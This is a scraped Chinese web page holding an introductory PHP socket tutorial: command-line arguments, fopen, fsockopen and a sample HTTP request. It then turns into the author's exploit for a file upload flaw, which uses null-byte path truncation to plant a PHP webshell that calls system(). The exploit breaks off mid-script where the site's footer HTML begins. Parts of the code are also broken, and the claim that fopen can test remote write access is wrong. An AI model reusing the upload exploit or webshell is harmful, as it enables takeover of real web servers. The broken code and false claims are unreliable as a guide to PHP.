PHP-SOCKETS初步编程

作者:darkness[bst]

msn:cqxy[at]21cn.net

学习php2个月了,收获挺多.但是与别人不同的是,我更喜欢socket.php在socket这方面的文章太少了.所以决定写一系列php-socket读书笔记.一直从最基本写到socket_raw.
实例+心得.实例将会有端口转发(突破防火墙),动网类型exp,端口扫描,php后门,发包型exp框架.由于学习缘故,每周只能写一篇.现给出卷一.希望大家一起投入到php shell编程中来.


前言:

php是世界上最流行的脚本语言之一。一直以来它在web编程中得到极广泛的应用。我想说的是php不仅在web方面出色，在shell方面同样出色。只是人们更习惯用perl来编写shell脚本.这里申明一下，本人不是php高手，接触php不过几个星期，这只是一篇读书笔记。有错误的地方请提出来。也可以给我mail，共同探讨php。

前置知识:

php最吸引我的地方就是sockets 扩展，事实上我会简单的vb winsock，完全能用vb写一个常用的winsock程序出来。但是我还是选择了php。因为它是跨平台的。

php默认是不支持高级socket的，只支持被“封装”的fsockopen等几个函数。socket作为php的扩展，需要设置一下才能使其支持。在windows需要设置php。ini，在php。ini找;windows extensions这一行，去掉;extension=php_sockets.dll 前面的分号。that‘s ok。*nix下则需要在编译的时候加入-enable—sockets命令。在没有使用dl（）函数的时候，你的php必须和在同一目录php_sockets.dll。好了，完成php socket配置了。

下面就是运行的问题了

在终端下运行php脚本很简单。windows下c:phpphp.exe ╟q test.php,*nix下要在php文件事先申明由php来执行，就像perl一样。像#!/usr/local/bin/php ╟q .，然后再来个./test.php。参数q的意思就是不输出php标头信息。

输入参数问题:

有的人说，php shell如何输入参数。在web的时候可以这样输入参数http://xxx.com/aa.php?参数1=xxxx&参数2=ssssss。没关系php同perl一样，具有相似的参数功能。来看官方的描述

“argv”

传递给该脚本的参数。当脚本运行在命令行方式时，argv 变量传递给程序 c 语言样式的命令行参数。当调用 get 方法时，该变量包含请求的数据。

“argc”

包含传递给程序的命令行参数的个数（如果运行在命令行模式）。



呵呵，简单的说。看我举个例子



以下是代码:
<? if ($argc != 4 || in_array($argc[1] , array(--help,-h,?))) { echo "by darkness[bst].we will come back soon! "; echo "------------------------------------------------ "; echo "c:/php/php.exe -q uploadexp.php <a href=http://www.bugkidz.org/upload.php target=_blank>http://www.bugkidz.org/upload.php</a> filepath "; echo "------------------------------------------------ "; } $host = $argv[1]; $url = $argv[2]; $path = $argv[3]; ?>
[ctrl+a 全部选择]


我想你应该看懂了哦，这里argc[0]是指的程序本身。也可以这样来.

print(%s,$argv[1]);
　

花中午在网吧的1个小时写下这一小段


前面一段谈到命令行方式的运行。更多请参照
http://www.php.net/manual/zh/features.commandline.php


1.fopen的应用
fopen也可以被称作被封装的socket函数。不仅用于文件读写，还可以用于socket。fopen相当于其他高级语言的inet控件/类，较于fsockopen，他对于url的操作更高级。

fopen的使用方法
$s = fopen ($url, mode);
fopen的mode属性：
mode 说明
r 只读方式打开，将文件指针指向文件头。
r+ 读写方式打开，将文件指针指向文件头。
w 写入方式打开，将文件指针指向文件头并将文件大小截为零。如果文件不存在则尝试创建之。
w+ 读写方式打开，将文件指针指向文件头并将文件大小截为零。如果文件不存在则尝试创建之。
a 写入方式打开，将文件指针指向文件末尾。如果文件不存在则尝试创建之。
a+ 读写方式打开，将文件指针指向文件末尾。如果文件不存在则尝试创建之。
x 创建并以写入方式打开，将文件指针指向文件头。如果文件已存在，则 fopen() 调用失败并返回 false，并生成一条 e_warning 级别的错误信息。如果文件不存在则尝试创建之。这和给 底层的 open(2) 系统调用指定 o_excl|o_creat 标记是等价的。此选项被 php 4.3.2 以及以后的版本所支持，仅能用于本地文件。
x+ 创建并以读写方式打开，将文件指针指向文件头。如果文件已存在，则 fopen() 调用失败并返回 false，并生成一条 e_warning 级别的错误信息。如果文件不存在则尝试创建之。这和给 底层的 open(2) 系统调用指定 o_excl|o_creat 标记是等价的。此选项被 php 4.3.2 以及以后的版本所支持，仅能用于本地文件。


即用于本地文件的操作，也可以用于inet。是不是很kool？
假如要测试一个站的iis目录是不是有写权限。
可以这样写
$s = fopen("http://www.bugkidz.org","x+") or die(“不存在写权限”)
如果存在的话，你可以继续构造下面的语句。用fwrite 远程写入文件。
但是一般的网站都是只读权限的
$s =fopen("http://www.bugkidz.org/index.php?id=1","r");
这样就读入了http://www.bugkidz.org/index.php?id=1的内容，但是还得经过处理才能获取完整的文件内容
这样
while (!feof($s)) {
echo fgets($s, 1024);
}
我认为fopen用于sql injection是最方便不过的了。
function phpinet($url)
{
fopen($url,"r") or die("打开url错误");


while (!feof($s)) {
$cahe = fgets($s, 1024);
}

retrun $cahe;
fclose($s)
}


这段函数等同于vb中的inet.openurl
fsockopen族函数的使用
fsockopen也是被封装的一类socket函数．有点类似于ＶＢ中的winsock控件．令人遗憾的是它支持主动socket连接，不支持bind，listen等，如果需要实现这些功能，则要使用ＰＨＰ中的高级socket编程．即便是这样，fsockopen函数也能满足大多数的需求．
这样使用fsockopen
resource fsockopen ( string target, int port [, int errno [, string errstr [, float timeout]]])

例子:
$sock = fsockopen("192.168.0.1",80,$errno,$errstr,30);
前面２个是地址和端口，中间２个是有关错误的变量，最后就是timeout设置了．
通常$sock = fsockopen("192.168.0.1",80);这样即可．
$sock = fsockopen("192.168.0.1",80)；这是典型的ＴＣＰ连接．ＵＤＰ连接这样来
$sock = fsockopen("udp://192.168.0.1",53);
用这个来写一个ＴＦＴＰ的客户端也是可以的．

fsockopen的应用实例：

实例一，简单的ＨＴＴＰ会话．

代码


以下是代码:
<?php $fp = fsockopen("<a href="http://www.example.com" target=_blank>www.example.com</a>", 80, $errno, $errstr, 30); if (!$fp) { echo "$errstr ($errno)<br /> "; } else { $out = "get / http/1.1 "; $out .= "host: <a href="http://www.example.com" target=_blank>www.example.com</a> "; $out .= "connection: close "; fwrite($fp, $out); while (!feof($fp)) { echo fgets($fp, 128); } fclose($fp); } ?>
[ctrl+a 全部选择]

流程一般是这样的
建立fsockopen　资源，定义发送内容，用fwrite函数或者fputs函数写入定义内容，一行一行的输出得到的内容，直到到达文件末尾，fgets函数或者是fread使用．使用fclose关闭建立的fsockopen　资源．
ＡＮＧＥＬ写了一个ＰＨＰ的端口扫描工具，贴出之
http://www.4ngel.net/article/20.htm

选择fsockopen　来写简单ＥＸＰ发送框架绝对是个goodidea．becoz　its　so　easy．
看我的ＰＨＰ上传漏洞的exp．

代码


以下是代码:
<?php #codz by darkness msn:cqxy[at]21cn.net $sock = fsockopen("<a href="http://www.ririririri.com" target=_blank>www.ririririri.com</a>",80); if (!$sock) { echo "cannot connect it!"; } $body = "-----------------------------7d41f4a600472 ". "content-disposition: form-data; name="path" ". " ". "<a href="http://www.ppp%00" target=_blank>www.ppp%00</a> ". "-----------------------------7d41f4a600472 ". "content-disposition: form-data; name="image"; filename="f:\tools\1.gif" ". "content-type: text/plain ". " ". "<?php ". "system($c); ". "?> ". "----------------------- <pre><span>补充：</span>Web开发 , php ,</pre></div><div class="zykmore"><script type="text/javascript" src="/js/s3.js"></script></div><div class="content"><p>上一个：<a href="/show/0d45587b601646f5.htm">在PHP中执行系统外部命令</a><br/>下一个：<a href="/show/18080392411422c2.htm">PHP生成静态页面详解</a></p><div class="piclist">更多图片编程知识:<ul><li><a href="/show/d597ad9b3838f554.htm"><img src='/upload/2014/12/20141227104311641164.gif' width=105 height=105><br/>iis6上配置php并且支持fastcgi</a></li><li><a href="/show/8da687e6b2fb4a8f.htm"><img src='/upload/201211/8/20121108192256365.jpg' width=105 height=105><br/>快速学习和熟悉PHP5.4的基本语法 </a></li><li><a href="/show/aa11261b01b3bd40.htm"><img src='/upload/2013111613/20110614160255514.jpg' width=105 height=105><br/>PHP设计模式漫谈之迭代器模式</a></li><li><a href="/show/e5612cd4c7a34330.htm"><img src='/upload/2013111613/2009061917083716.jpg' width=105 height=105><br/>用基于Linux的PHP自建维基Wiki网站</a></li><li><a href="/show/d3afcacc2efdb80e.htm"><img src='/upload/2013111604/20121231104033947.png' width=105 height=105><br/>Yii Framework 开发教程Zii组件-GridView示例 </a></li><li><a href="/show/90428e63ef770c4b.htm"><img src='/upload/2006-3/200631414650228.jpg' width=105 height=105><br/>Tutorial for migrating data from MS Access to MySQL(英文的哦，要有思想准备)</a></li></ul></div></div> <div class="zykmore"><script type="text/javascript" src="/js/s4.js"></script></div><div class="more"><dl><dt>更多<a href="/list/2_1.htm">php</a>疑问解答：</dt><dd><a target="_blank" href="/show/a0b923820dcc509a.htm">wordpress问题<?php if(have_posts()) : ?></a></dd><dd><a target="_blank" href="/show/9d4c2f636f067f89.htm">建设一个搜索类网站php还是jsp，数据库那个好</a></dd><dd><a target="_blank" href="/show/4b5ce2fe28308fd9.htm">我是一个学PHP的，我现在已经学会了PHP，HTML，CSS，JS，JQ，AJAX，XML，thinkPHP，smarty模板</a></dd><dd><a target="_blank" href="/show/a2f3e71d9181a67b.htm">没理由啊 php代码无法执行，貌似有语法错误。。。</a></dd><dd><a target="_blank" href="/show/bbce2345d7772b06.htm">关于PHP 和API 的一段代码不懂啊不懂，请高手指点！ 这是淘宝API的</a></dd><dd><a target="_blank" href="/show/5a880faf6fb5e608.htm">php语言中，序列化到底在那里使用？它的优势是什么？劣势是什么？</a></dd><dd><a target="_blank" href="/show/ceea167a5a36dedd.htm">PHP函数等于或等于应该怎么表达</a></dd><dd><a target="_blank" href="/show/fb98ab9159f51fd0.htm">请教php高手，解决basename函数和mb_substr函数处理中文文件名称的解决方法，在上传文件时，总是出现乱码</a></dd><dd><a target="_blank" href="/show/2e2d7fbdea1afc51.htm">.NET，PHP，JAVA，JS优秀点分别是？</a></dd><dd><a target="_blank" href="/show/02a44259755d38e6.htm">织梦cms 在环境监测的时候 wamp5 gd不支持 是为什么。;extension=php_gd2.dll这一句我删除了还是不显示？</a></dd><dd><a target="_blank" href="/show/d9caa6e02c990b0a.htm">我想学PHP。1.应安装什么编程工具？ 2. 装LIUNX系统是装简易的还是？什么版本的？3.还应安装什么？</a></dd><dd><a target="_blank" href="/show/6fe97759aa27a0c9.htm"><?php 和 <? 有什么区别</a></dd><dd><a target="_blank" href="/show/c124a10e0db5e4b9.htm">PHP网页如何接收按钮的值？请问</a></dd><dd><a target="_blank" href="/show/22bcc25a6f606eb5.htm">买来书的代码运行好是错误。。帮帮忙啊。php</a></dd><dd><a target="_blank" href="/show/1eae257e44aa9d5b.htm">求，一个php代码，用来修改 mysql数据库中的商品名字的大小写</a></dd></dl></div> </div> <div id="zykleft"> <div class="leftm"> <div id="logo"><a href="http://www.zzzyk.com/">站长资源库</a> <div class="clear"></div><script type="text/javascript" src="/js/i7f.js"></script></div> <script type="text/javascript" src="/js/sharen.js"></script><div class="clear"></div> <dl class="list"><dd><a href="/list/1_1.htm">asp</a></dd><dd><a href="/list/2_1.htm">php</a></dd><dd><a href="/list/3_1.htm">Delphi</a></dd><dd><a href="/list/4_1.htm">Matlab</a></dd><dd><a href="/list/5_1.htm">JSP</a></dd><dd><a href="/list/6_1.htm">Foxpro</a></dd><dd><a href="/list/7_1.htm">JS</a></dd><dd><a href="/list/8_1.htm">C/C++</a></dd><dd><a href="/list/9_1.htm">C#/ASP.NET</a></dd><dd><a href="/list/10_1.htm">VC++</a></dd><dd><a href="/list/11_1.htm">JAVA</a></dd><dd><a href="/list/12_1.htm">VB</a></dd><dd><a href="/list/13_1.htm">汇编语言</a></dd><dd><a href="/list/20_1.htm">html/css</a></dd><dd><a href="/list/21_1.htm">CGI</a></dd><dd><a href="/list/23_1.htm">XML/UML</a></dd><dd><a href="/list/24_1.htm">wap</a></dd><dd><a href="/list/27_1.htm">网站相关</a></dd><dd><a href="/list/60_1.htm">网页素材</a></dd><dd><a href="/list/70_1.htm">python</a></dd></dl><dl class="notice">如果你遇到<a href="/default.htm">编程学习</a>难题：<br/>请访问www.zzzyk.com 试试</dl> </div> <div class="leftm"><dl><dt><script type="text/javascript" src="/js/s5.js"></script></dt></dl></div> <div class="leftm"><dl><dt><script type="text/javascript" src="/js/s6.js"></script></dt></dl></div> </div></div> <div class="clear"></div> <div class="bdshare"> <script type="text/javascript" src="/js/share.js"></script> </div> <div class="clear"></div> <div class="foot">CopyRight © 2012 站长网 编程知识问答 <a href="http://www.zzzyk.com">www.zzzyk.com</a> All Rights Reserved<br/>部份技术文章来自网络，<script type="text/javascript" src="/images/my.js"></script> </div> </body> </html>